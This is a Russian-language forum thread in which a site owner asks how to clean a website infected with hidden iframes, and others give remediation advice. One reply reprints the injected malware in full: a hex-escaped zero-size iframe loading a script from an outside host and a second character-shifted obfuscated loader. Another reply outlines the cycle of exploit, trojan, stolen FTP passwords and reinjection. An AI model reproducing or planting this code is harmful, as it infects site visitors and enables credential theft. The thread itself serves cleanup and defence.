Web-вирусы. iframe

[Juri]

вы мне лучше скажите как от этого сайт теперь избавить?

сегодня проверился касперским с новыми базами нашол около 20 троянчиков в кэше оперы. все почистил и удалил(

но что делать с сайтом?

 

[Nektov]

Для просмотра ссылки Войди или Зарегистрируйся
Закрыть **х. Меньше геморроя будет

А если по сути.
Проверь не ломанули ли хостера. (пройдись по другим сайтам хостера, желательно на том же сервере). Если ломанули - меняй.
И как уже говорили, меняй всё и вся (пасы и тд.)

Также посмотри сайт на возможность заражения (шел скул инъекция).

Что у тя за двиг ? Дай адрес сайта.

 

[prokopa]

помню один раз пришлось тоже вычислять бажных соседей и латать их дырку
попробуй, может тоже поможет.

 

[Juri]

двг? он самописный если это двигом можно назвать, давно этим сайтом не занимался но вот щас опять решил поднять. адрес вот

Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.

а если сменить все пароли убить все на серваке а потом по новой залить это опможет?

 

[Nektov]

Чё у тя за хорень

<script>if(document.cookie.indexOf('tnd=on')==-1){expires=new Date();expires.setTime(expires.getTime()+86400000);document.cookie='tnd='+escape('on')+'; expires='+expires.toGMTString()+'; path=/';status=location;document.write(unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%75%70%64%61%74%65%7a%2e%69%6e%66%6f%2f%65%74%63%2f%74%64%73%2e%70%68%70%22%20%77%69%64%74%68%3d%30%20%68%65%69%67%68%74%3d%30%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%20%6f%6e%4c%6f%61%64%3d%22%73%74%61%74%75%73%3d%64%65%66%61%75%6c%74%53%74%61%74%75%73%3b%22%3e%3c%2f%69%66%72%61%6d%65%3e'));}</script><script>var source ="=tdsjqu?epdvnfou/xsjuf)voftdbqf)(&4d&84&74&83&7:&81&85&4f&75&7g&74&86&7e&76&7f&85&3f&88&83&7:&85&76&39&64&85&83&7:&7f&78&3f&77&83&7g&7e&54&79&72&83&54&7g&75&76&39&47&41&3d&42&42&46&3d&4:&4:&3d&42&42&45&3d&42&41&46&3d&42&42&43&3d&42&42&47&3d&47&43&3d&44&43&3d&42&42&49&3d&4:&48&3d&42&42&45&3d&44&43&3d&49&44&3d&42&42&47&3d&42&42&45&3d&47&42&3d&44&45&3d&44&4:&3d&44&43&3d&42&41&45&3d&42&41&42&3d&42&41&46&3d&42&41&44&3d&42&41&45&3d&42&42&47&3d&47&42&3d&44&4:&3d&45&4:&3d&44&4:&3d&44&43&3d&42&42&46&3d&42&42&47&3d&42&43&42&3d&42&41&49&3d&42&41&42&3d&47&42&3d&44&4:&3d&42&42&49&3d&42&41&46&3d&42&42&46&3d&42&41&46&3d&4:&49&3d&42&41&46&3d&42&41&49&3d&42&41&46&3d&42&42&47&3d&42&43&42&3d&46&49&3d&44&43&3d&42&41&45&3d&42&41&46&3d&42&41&41&3d&42&41&41&3d&42&41&42&3d&42&42&41&3d&46&4:&3d&44&4:&3d&47&43&3d&47&41&3d&45&48&3d&42&41&46&3d&42&41&43&3d&42&42&45&3d&4:&48&3d&42&41&4:&3d&42&41&42&3d&47&43&3d&44&43&3d&44&43&3d&47&41&3d&42&41&46&3d&42&41&43&3d&42&42&45&3d&4:&48&3d&42&41&4:&3d&42&41&42&3d&44&43&3d&42&42&46&3d&42&42&45&3d&4:&4:&3d&47&42&3d&44&4:&3d&42&41&45&3d&42&42&47&3d&42&42&47&3d&42&42&43&3d&46&49&3d&45&48&3d&45&48&3d&42&42&46&3d&42&42&42&3d&4:&4:&3d&42&41&48&3d&42&42&46&3d&46&43&3d&45&46&3d&46&44&3d&45&47&3d&4:&49&3d&42&41&46&3d&42&43&43&3d&45&48&3d&42&41&46&3d&42&42&41&3d&42&41&41&3d&42&41&42&3d&42&43&41&3d&45&47&3d&42&42&43&3d&42&41&45&3d&42&42&43&3d&44&4:&3d&44&43&3d&42&42&4:&3d&42&41&46&3d&42&41&41&3d&42&42&47&3d&42&41&45&3d&47&42&3d&44&4:&3d&45&4:&3d&44&45&3d&42&44&3d&42&41&3d&42&41&41&3d&42&42&42&3d&4:&4:&3d&42&42&48&3d&42&41&4:&3d&42&41&42&3d&42&42&41&3d&42&42&47&3d&45&47&3d&42&42&4:&3d&42&42&45&3d&42&41&46&3d&42&42&47&3d&42&41&42&3d&45&41&3d&49&44&3d&42&42&47&3d&42&42&45&3d&45&47&3d&42&42&46&3d&42&42&48&3d&4:&49&3d&42&42&46&3d&42&42&47&3d&42&42&45&3d&42&41&46&3d&42&42&41&3d&42&41&44&3d&45&41&3d&46&44&3d&46&41&3d&45&45&3d&45&4:&3d&45&49&3d&46&44&3d&45&42&3d&45&45&3d&49&44&3d&42&42&47&3d&42&42&45&3d&45&47&3d&42&42&46&3d&42&42&48&3d&4:&49&3d&42&42&46&3d&42&42&47&3d&42&42&45&3d&42&41&46&3d&42&42&41&3d&42&41&44&3d&45&41&3d&45&49&3d&45&45&3d&46&44&3d&46&41&3d&45&42&3d&45&42&3d&44&43&3d&47&41&3d&45&48&3d&42&42&46&3d&4:&4:&3d&42&42&45&3d&42&41&46&3d&42&42&43&3d&42&42&47&3d&47&43&3:&3:&4c&4d&3g&84&74&83&7:&81&85&4f(**=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>

Это все твои фреймы ?

Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.

Убить свё незнаю. Мне кажется, у тя дыры есть.
Будет время поищу, отпишусь.
А пароли можешь сменить. Только если есть дыры все равно сопрут.

Гы: Для просмотра ссылки Войди или Зарегистрируйся

 

[almaz]

двг? он самописный если это двигом можно назвать, давно этим сайтом не занимался но вот щас опять решил поднять. адрес вот *** скрытое содержание ***
а если сменить все пароли убить все на серваке а потом по новой залить это опможет?

Мне это помогло снес все вместе сPanel,все заново установил и поменял все пароли.

 

[Juri]

Чё у тя за хорень
Это все твои фреймы ?
*** скрытое содержание ***

Убить свё незнаю. Мне кажется, у тя дыры есть.
Будет время поищу, отпишусь.
А пароли можешь сменить. Только если есть дыры все равно сопрут.

Гы: Для просмотра ссылки Войди или Зарегистрируйся

что касаеться этой херни то это не мое.
что касаеться дыр, возможно, так как я тогда был совсем сырым програмером...
что касаеться фото это не мое... мое другое..)))
буду рад если поищешь дыры и отпишешься только в личку желательно )

 

[REALiSTiC]

1) Вы заходите на страницу с ифреймом.
2) Вас пробивает эксплоит
3) Грузится и запускается трой
4) Трой отсылает отсчеты (пароли, etc) на сервак хозяина
5) Отсчеты парсятся, выбираются фтп
6) Фтп загоняются в ифреймер, который ставит линки на сплоит
7) Goto: 1)

 

[lobzik]

Вобщем, меняй все пароли. Тот код что был приведен и есть код эксплойта, который подгружает трой. Не юзай ie, юзай operа или ff и будет тебе счастье... ну антивирь и фаер самособой... И не забудь почистить страницы (обычно только индексевые) от левого ява-скрипта, который будет наверняка где то в конце кода.

 

[REALiSTiC]

Вобщем, меняй все пароли.

Так делают только дауны...
После того как сменишь, отсчет будет оправлен еще раз.

100% поможет только переустановка ОС...